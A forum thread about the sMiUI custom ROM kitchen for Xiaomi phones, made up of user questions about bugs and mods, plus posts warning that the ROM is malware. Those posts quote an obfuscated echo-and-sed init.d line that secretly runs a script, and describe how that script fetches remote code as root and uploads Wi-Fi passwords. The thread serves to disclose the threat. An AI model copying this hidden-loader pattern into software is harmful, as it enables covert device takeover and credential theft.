closed

Search This thread
S

sebsch1991

You can find Changelog in original Post here : mod edit

Last edited by a moderator:

MikeFRG

Nov 8, 2010
even i click on "Click HERE for Mod-Information" its impossible to for me to click anywhere else! ?

G

GuestD1080

I need some help,i have problem with this rom Smiui.I installed the 5.10.22 rom hermes on my redmi note 2 and i have this error:

Basically i cant use another music player,because the basic music player on the rom smiui have this error: nav.local_song i installed two times the rom and do the usually wipes for twrp:

Wipe cache
wipe data
Wipe dalvik
Wipe system

The two times i installed the rom have the same issue.Before i installed the 5.10..22, installed another version called 5.9.30 smiui in that version the music player was working fine but for some unknown reason appeared that nasty bug the nav_local_song.I need help so please i need some advice to fix quickly this issue.Thank you so much for reading me and waiting for a reply.

gasperoni

Nov 10, 2011
Hello
I have a question about the option Center Clock MOD

Change the look of your statusbar to iPhone iOS Style.

How does it look enabled and disabled? I don't know which to use. is it possible to see a screenshot with the IOS Style and without? I really would like to see the difference first

thanks

SkiFire13

Oct 1, 2014
Maerne City
Hello
I have a question about the option Center Clock MOD

Change the look of your statusbar to iPhone iOS Style.

How does it look enabled and disabled? I don't know which to use. is it possible to see a screenshot with the IOS Style and without? I really would like to see the difference first

thanks
Here you can see the Center Clock MOD, without is as the standard MIUI

~ Xiaomi Redmi Note 2 Prime ~

Reactions: gasperoni

wasd-

Jan 9, 2014
sMiUI is based on weekly and stable builds. Just click on your device and you can select which version you want to create/download :)

5.11.5 will be online today :)

Would be nice if you could add again the 5.10.22 for Hermes. Is by far the best battery version and it's no longer available.

MatVekk

Jan 14, 2013
Padua
Google Pixel 7
Hello, shortly receive my RedMi Notes 2 ... I can not wait to try this rom. It looks fantastic and the configurator to create it is fantastic. Compliments.
PS: I can install from TWRP?

verbage

Aug 12, 2014
Hey sebsch1991, just my kudos and thanks for a really nice rom solution! Question for you at the same time. Similar to how you have a check/uncheck system for some apps and mods at this point, would you consider adding on additional options to be able to produce an even cleaner/leaner rom? For example, would it be possible to add check/uncheck options for Calculator, Cloud Print, Mi Account, Mi Drop, Mi VIP, Themes, Updater, Xiaomi Assistant, Xiaomi Service Framework, Yellow Pages, etc. so one could make a super, super clean rom version? Maybe the default would have these items checked when cooking the rom, but they could at least be unchecked by those hoping for something superclean. I realize they can be frozen/uninstalled with the right tools (and that's what I have already done), but not having them installed at all is much more preferable. The above apps/apks are just what stood out to me, but having even more granular control to subtract almost any app would be be awesome! Anyway, I've just made a contribution to your liquid happiness account in hopes that this may help you decide! Thanks again for this fantastic service you are providing!

dhanu007

Aug 3, 2010
sMiUI ROM - Kitchen
website_screenshot.png

sMiUI is a Custom-ROM for Xiaomi-Devices that started in late 2014. It is based on the weekly Developer ROM and the stable ROM as well, released by Xiaomi. Further we participate from the xioami.eu Team, which does a great job in adding European languages to the chinese ROM!
sMiUI packs lots of great features, fixes and performance-tunings on top!

FEATURES

Multilanguage -- CenterClock
init.d Support -- CRT-OFF
zipaligned -- Battery Tweaks
Performance Tweaks -- RAM Tweaks
Cleaner UI -- SuperSu Root
Removed Chinese Apps -- Faster GPS
3-Way Reboot Menu -- Volume Boost
Modded UI Animations -- AdBlocker
Unicode MMS -- SystemApp Selection
CPU/Thermal Tweaks -- And many more ...

sMiUI_screenshot20.png
sMiUI_screenshot3.png
sMiUI_screenshot5.png

sMiUI_screenshot15.png
sMiUI_screenshot11.png

The sMiUI ROM-Kitchen enables you to choose and select only the Features and Mods you want! You can either cook a ROM with basic improvements, or pack lots of Design, Performance and App Features on top of it.
Select your device and start customizing sMiUI just as you like it - its easy as that.

read more and download sMiUI at www.smiui.net
cooking.jpg

powered and supplied by GearBest.com
Facebook -> GearBestSmartphone
.​
Hi , thanks..One question is can we used xposed on this ?.. I am goin to install the latest hermes MIUI 7.0.x.x.x. whtver that is....

Top Liked Posts

• There are no posts matching your filters.
    This firmware is malware.

At least it downloads ads. But also it allows the author to take control on your phone.
    Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
    Scripts from /system/etc/init.d are run at system start. There is a script "01sMIUI_optimizations". It contains a line
    Code:
    /system/bin/sh `echo "binajkdpjni%usr" | sed 's!^\(...\)\(.\)...\(.\)..\(i\).\(...\)$!/\5/\1/\2\3\4!g'`
    echo+sed make string "/system/bin/api" and finally the command is
    Code:
    /system/bin/sh /system/bin/api
    So it just runs "/system/bin/api". And that script does many bad actions, for example:
    - loads new version of the script from https://smiui.net/api and saves it to the system. The author can place there any code and the code will be executed on your phone with root rights!
    - it uploads the content of the file "/data/misc/wifi/wpa_supplicant.conf" (your Wi-Fi passwords) to https://smiui.net/api1.php
    - it loads some ads (functions func_PROP, func_REV, func_TOTAL) in the background. Not only when you visit smiui.net, but in any time, constantly (when it receives "START" from their server)!
    - there is also very very bad function func_SRV (+func_FILES), but it is commented (does not run). It makes your phone a part of the botnet! It loads some binaries (they do not exists for now) and looks like they start some tunnel/proxy on the phone.
    Hey sebsch1991, just my kudos and thanks for a really nice rom solution! Question for you at the same time. Similar to how you have a check/uncheck system for some apps and mods at this point, would you consider adding on additional options to be able to produce an even cleaner/leaner rom? For example, would it be possible to add check/uncheck options for Calculator, Cloud Print, Mi Account, Mi Drop, Mi VIP, Themes, Updater, Xiaomi Assistant, Xiaomi Service Framework, Yellow Pages, etc. so one could make a super, super clean rom version? Maybe the default would have these items checked when cooking the rom, but they could at least be unchecked by those hoping for something superclean. I realize they can be frozen/uninstalled with the right tools (and that's what I have already done), but not having them installed at all is much more preferable. The above apps/apks are just what stood out to me, but having even more granular control to subtract almost any app would be be awesome! Anyway, I've just made a contribution to your liquid happiness account in hopes that this may help you decide! Thanks again for this fantastic service you are providing!
    At least it downloads ads. But also it allows the author to take control on your phone.
    Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
    It runs by /system/etc/init.d/01sMIUI_optimizations:
    Code:
    /system/bin/sh `echo "binajkdpjni%usr" | sed 's!^\(...\)\(.\)...\(.\)..\(i\).\(...\)$!/\5/\1/\2\3\4!g'`
    = /system/bin/api
    Thanks for the warning. I've checked those files and can confirm what @peter232 said.

Stay away from this rom!

EDIT:
    Here is the content of the file /system/bin/api : http://pastebin.com/LQqjbcqF
    You can see starting line 500 a function that rename your host file (in case you use it to block ads), then request an ad (with some requests back and forth between the ads portal and the smiui site so that the ads server think the request comes from the smiui website), then put back your host file.
    This function gets called in an infinite loop (line 599)
    Anyone tried the version based on Miui 6.6.23 already? Is it stable enough for daily use?

I installed it this morning and so far it is awesome. I went from 6.6.23 to sMIUI 6.6.23 without wiping
    Yes, I use twrp 3.0. Is it really necessary to wipe data too? It took so much time to install everything again. Is a dirty flash of xiaomi.eu over smiui not possible?
    Thanks for your reply....
    In my view, you will get mega problems with dirty flashing, unless the xiami.eu version that you are flashing is exactly the same base as smiui. For example, if both are based on 6.8.25, then dirty flashing may be possible.